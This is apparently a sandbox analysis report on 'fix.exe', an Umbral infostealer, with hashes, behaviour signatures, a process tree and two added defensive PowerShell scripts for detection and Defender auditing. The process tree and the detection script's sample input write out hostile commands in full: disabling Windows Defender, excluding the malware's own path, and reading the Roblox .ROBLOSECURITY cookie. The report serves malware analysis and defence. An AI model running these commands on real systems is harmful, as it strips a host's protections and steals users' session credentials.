Analysis

max time kernel: 143s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-06-2024 22:13
Behavioral task: behavioral1
Sample: fix.exe
Resource: win7-20240508-en
General

Target: fix.exe
Size: 229KB
MD5: 1adeea63d576dea9add98e01e9fe78b4
SHA1: 8f754fd661d9ce2e9e9a7278b4dd7096b13fc585
SHA256: 5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84
SHA512: 0ba3c5555273a15c5406f0bd1b5f1a3888814bdbb4130f80eae1f973497c4e5d81a92ed0797a55316b358a42a955fe44f476d1e0e90c15211dc30f4dd20c58cb
SSDEEP: 6144:lloZMCrIkd8g+EtXHkv/iD4sodaBPUonIWvRsY99ib8e1miLZi:noZZL+EP8sodaBPUonIWvRsY9wfLA
Malware Config
Signatures
-
Detect Umbral payload (1 IoC)
  resource: behavioral2/memory/652-1-0x0000024BA9B90000-0x0000024BA9BD0000-memory.dmp
  yara_rule: family_umbral
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell to change Windows Defender settings; the signature covers exclusions for file extensions, paths and processes, and in this run the flagged process adds a path exclusion for the sample's own executable (see the process tree below).
  pid   Process
  3108  powershell.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers commonly target stored browser data such as saved credentials and cookies. No file or registry IoCs are listed for this signature in this run.
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  25    discord.com
  26    discord.com
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  20    ip-api.com
Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine the installed video card.
  pid   Process
  3204  wmic.exe
Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid   Process          count
  3108  powershell.exe   2
  220   powershell.exe   2
  1048  powershell.exe   2
  3516  powershell.exe   2
  388   powershell.exe   2
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token             pid   Process
  SeDebugPrivilege  652   fix.exe
  SeDebugPrivilege  3108  powershell.exe
  SeDebugPrivilege  220   powershell.exe
  SeDebugPrivilege  1048  powershell.exe
  SeDebugPrivilege  3516  powershell.exe

  3376 wmic.exe, the following set enabled twice:
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege,
    33, 34, 35, 36

  2328 wmic.exe:
    SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
    SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
    SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
    SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege

  The long wmic.exe lists are what wmic.exe enables on its own token at start-up regardless of who launches it and carry little signal by themselves; the SeDebugPrivilege requests by fix.exe and its PowerShell children are the entries worth noting.
Suspicious use of WriteProcessMemory (18 IoCs)
  pid  Process  wrote to memory of  procid_target  count
  652  fix.exe  3108                90             2
  652  fix.exe  220                 92             2
  652  fix.exe  1048                94             2
  652  fix.exe  3516                96             2
  652  fix.exe  3376                98             2
  652  fix.exe  2328                101            2
  652  fix.exe  972                 103            2
  652  fix.exe  388                 105            2
  652  fix.exe  3204                107            2

  The targets are exactly the nine children fix.exe spawns in the process tree below, consistent with ordinary child-process creation rather than injection into an unrelated process.
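The behaviours listed above all come from one parent (PID 652) spawning a short, recognisable chain of PowerShell and WMIC children. As an added example that is not part of the sandbox report, the PowerShell below scores process-creation records for that chain. The $records array is constructed from this report's process tree with one benign control added; the rule names, weights and threshold are this example's own choices, not anything the sandbox or the malware defines.

```powershell
# Added example, not from the sandbox report: score process-creation records for the
# child-process chain this sample produces. $records is CONSTRUCTED from the report's
# process tree plus one benign control; real input would be Sysmon Event ID 1 or
# Security 4688 events mapped to the same three fields.
$records = @(
    [pscustomobject]@{ ParentPid = 652; Image = 'powershell.exe'
        CommandLine = "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fix.exe'" }
    [pscustomobject]@{ ParentPid = 652; Image = 'powershell.exe'
        CommandLine = 'Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend' }
    [pscustomobject]@{ ParentPid = 652; Image = 'powershell.exe'
        CommandLine = 'Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY' }
    [pscustomobject]@{ ParentPid = 652; Image = 'wmic.exe'; CommandLine = 'wmic.exe os get Caption' }
    [pscustomobject]@{ ParentPid = 652; Image = 'wmic.exe'; CommandLine = 'wmic.exe computersystem get totalphysicalmemory' }
    [pscustomobject]@{ ParentPid = 652; Image = 'wmic.exe'; CommandLine = 'wmic.exe csproduct get uuid' }
    [pscustomobject]@{ ParentPid = 652; Image = 'wmic.exe'; CommandLine = 'wmic path win32_VideoController get name' }
    # Benign control: an administrator adding one exclusion from an interactive shell.
    [pscustomobject]@{ ParentPid = 4000; Image = 'powershell.exe'; CommandLine = "Add-MpPreference -ExclusionPath 'D:\Builds'" }
)

# Rule names, weights and the threshold are this example's own choices (assumptions).
# -match is case-insensitive in PowerShell, so the patterns need no (?i).
$rules = @(
    @{ Name = 'defender_exclusion'; Weight = 3; Pattern = 'Add-MpPreference\s.*-Exclusion(Path|Process|Extension)\b' }
    @{ Name = 'defender_disable';   Weight = 5; Pattern = 'Set-MpPreference\s.*-Disable\w+\s+\$true' }
    @{ Name = 'defender_no_cloud';  Weight = 2; Pattern = '-MAPSReporting\s+(Disabled|0)\b|-SubmitSamplesConsent\s+(NeverSend|2)\b' }
    @{ Name = 'roblox_cookie';      Weight = 4; Pattern = '\.ROBLOSECURITY\b' }
    @{ Name = 'wmic_fingerprint';   Weight = 1; Pattern = '^wmic(\.exe)?\s+(os\s+get\s+caption|computersystem\s+get\s+totalphysicalmemory|csproduct\s+get\s+uuid|path\s+win32_videocontroller)' }
)

function Get-UmbralLikeActivity {
    param([Parameter(Mandatory)][object[]]$Events, [int]$Threshold = 8)

    # One hit per (event, rule) pair; a single event can match more than one rule.
    $hits = foreach ($e in $Events) {
        foreach ($r in $rules) {
            if ($e.CommandLine -match $r.Pattern) {
                [pscustomobject]@{ ParentPid = $e.ParentPid; Image = $e.Image; Rule = $r.Name; Weight = $r.Weight }
            }
        }
    }

    # Score per parent. A lone exclusion (the control) is not enough: the pattern is one
    # parent that both tampers with Defender and runs several WMIC fingerprint queries.
    foreach ($g in ($hits | Group-Object ParentPid)) {
        $score        = ($g.Group | Measure-Object Weight -Sum).Sum
        $names        = @($g.Group | ForEach-Object Rule | Sort-Object -Unique)
        $fingerprints = @($g.Group | Where-Object Rule -eq 'wmic_fingerprint').Count
        [pscustomobject]@{
            ParentPid  = [int]$g.Name
            Score      = $score
            Rules      = $names -join ','
            Suspicious = ($score -ge $Threshold) -and ($fingerprints -ge 3) -and (@($names -match '^defender_').Count -gt 0)
        }
    }
}

Get-UmbralLikeActivity -Events $records | Format-Table -AutoSize
```

With the constructed input, parent 652 scores 18 across all five rules and is marked suspicious, while the control parent 4000 scores 3 on defender_exclusion alone and is not. Keying the verdict on the combination rather than on any one command is deliberate: Add-MpPreference and even Set-MpPreference -Disable... appear in legitimate administration, whereas the same parent also querying OS caption, total memory, product UUID and video controller through WMIC in quick succession does not.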
Processes

C:\Users\Admin\AppData\Local\Temp\fix.exe
  "C:\Users\Admin\AppData\Local\Temp\fix.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 652

  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fix.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3108

  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 220
      Note: "&&" is not a statement separator in Windows PowerShell 5.1 (the v1.0\powershell.exe invoked here), so this whole command line is rejected at parse time and none of these Set-MpPreference changes apply in that shell. The Add-MpPreference exclusion in PID 3108 is a separate invocation and is unaffected.

  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1048

  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3516
      Note: the command line is reproduced as the sample ran it; HKLN: is not a registry drive in PowerShell, so this second lookup errors out.

  +-- C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      - Suspicious use of AdjustPrivilegeToken
      PID: 3376

  +-- C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      - Suspicious use of AdjustPrivilegeToken
      PID: 2328

  +-- C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      PID: 972

  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      - Suspicious behavior: EnumeratesProcesses
      PID: 388

  +-- C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      - Detects videocard installed
      PID: 3204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1036 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
  PID: 3104
  Note: a top-level Edge utility process, not a child of fix.exe.
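To check a host for exactly the Defender changes this sample attempts, and to undo them, the following is an added example and not code from the report. Get-MpPreference, Set-MpPreference and Remove-MpPreference are the real Defender cmdlets; the $Baseline values are an assumption about a hardened host (Controlled Folder Access and Network Protection are off by default, so only expect them enabled if your own configuration turns them on).

```powershell
# Added example, not from the report: audit Defender for the settings this sample
# tries to change, and optionally revert them. Run in an elevated Windows PowerShell.
# $Baseline is an ASSUMPTION about a hardened host; adjust it to your own policy.
# Numeric values are those Get-MpPreference returns: ControlledFolderAccess 1=Enabled,
# NetworkProtection 1=Enabled, MAPSReporting 2=Advanced, SubmitSamplesConsent 1=SendSafeSamples.
function Test-DefenderTamper {
    [CmdletBinding()]
    param(
        [switch]$Revert,
        [hashtable]$Baseline = @{
            EnableControlledFolderAccess = 1
            EnableNetworkProtection      = 1
            MAPSReporting                = 2
            SubmitSamplesConsent         = 1
        }
    )

    $p = Get-MpPreference
    $findings = [System.Collections.Generic.List[object]]::new()

    # Boolean switches the sample set to $true with Set-MpPreference.
    foreach ($name in 'DisableRealtimeMonitoring', 'DisableIOAVProtection',
                      'DisableScriptScanning', 'DisableIntrusionPreventionSystem') {
        if ($p.$name) {
            $findings.Add([pscustomobject]@{ Setting = $name; Current = $p.$name; Expected = $false })
        }
    }

    # Enumerations the sample set to Disabled / AuditMode / NeverSend, compared to the baseline.
    foreach ($name in $Baseline.Keys) {
        if ([int]$p.$name -ne [int]$Baseline[$name]) {
            $findings.Add([pscustomobject]@{ Setting = $name; Current = $p.$name; Expected = $Baseline[$name] })
        }
    }

    # The sample whitelists its own binary under the user's Temp directory with
    # Add-MpPreference -ExclusionPath; any exclusion there is worth a look.
    $badPaths = @($p.ExclusionPath | Where-Object { $_ -match '\\AppData\\Local\\Temp\\' })
    foreach ($path in $badPaths) {
        $findings.Add([pscustomobject]@{ Setting = 'ExclusionPath'; Current = $path; Expected = '<none>' })
    }

    if ($Revert -and $findings.Count -gt 0) {
        if ($badPaths.Count -gt 0) { Remove-MpPreference -ExclusionPath $badPaths }
        # The enum parameters accept the numeric values, as the sample's own
        # "-SubmitSamplesConsent 2" shows, so the baseline can be passed straight through.
        Set-MpPreference -DisableRealtimeMonitoring $false -DisableIOAVProtection $false `
                         -DisableScriptScanning $false -DisableIntrusionPreventionSystem $false `
                         -EnableControlledFolderAccess $Baseline.EnableControlledFolderAccess `
                         -EnableNetworkProtection $Baseline.EnableNetworkProtection `
                         -MAPSReporting $Baseline.MAPSReporting `
                         -SubmitSamplesConsent $Baseline.SubmitSamplesConsent
    }
    return $findings
}

# Report only; add -Revert to restore the baseline.
Test-DefenderTamper | Format-Table -AutoSize
```

Two caveats. Tamper Protection, where it is switched on, blocks Set-MpPreference changes to these settings in the first place, so an empty result from this audit does not by itself tell you whether the sample ran; pair it with the process-creation evidence. And a cleaned configuration is not a cleaned host: the exclusion was added so that fix.exe could stay resident, so the binary and anything it dropped still need to be found and removed.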
Network

MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 944B
MD5: d28a889fd956d5cb3accfbaf1143eb6f
SHA1: 157ba54b365341f8ff06707d996b3635da8446f7
SHA256: 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512: 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Filesize: 948B
MD5: ecac37a294a8f17b9c89abc6354cb1fe
SHA1: b918fd8ca0ec11fc4a39633a8dc94abe60140eb9
SHA256: 51037b293178bc395824bb6fd9b80ba7c23399c4e4a74f0bc067a557a1da9fb8
SHA512: 7b5e3032a2848f46cbf330b06693304945e4257cc2a7220f28adaa7b71aad7f63872379aebe6f1cfb68b78a9605d3ed5c1ddc6549f720e9bb7ac95b1c2a0ed64

Filesize: 1KB
MD5: 57c9afc76e218af6740cddec86b8d154
SHA1: 5284732e69315f90b9e9515180f1612a19dedaa5
SHA256: 0be96f24ba9a643ea5e09901c8c9398d63c475f2c41e126563f1ca980338a48c
SHA512: 7fc967fc456f93e5ad1752171256284afb53768ec2e5ec1c02c35175b7bf0586a0e9e0318a9779970abac3c0d55e2946840d3597c2f28db0ad22d123b8b1f0fe

Filesize: 1KB
MD5: d9d2e5db9e09be20ad0a44e76e96e104
SHA1: 76d8f8e9cccf05ad348e6b31ecd05a4d55f9c04a
SHA256: 443e637928501418b10db993aa9a59b0d5eee42a1e37f1888e8c05bd42206a6e
SHA512: 2c87b1d2d208b25c3e5ffe38d8ff3a6b86c1eddac7e9d4a036826884f08d72b0855df11e2c8b9144054e07e5f1e431936413fd9de276aac2862613c2dd6c6fcc

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82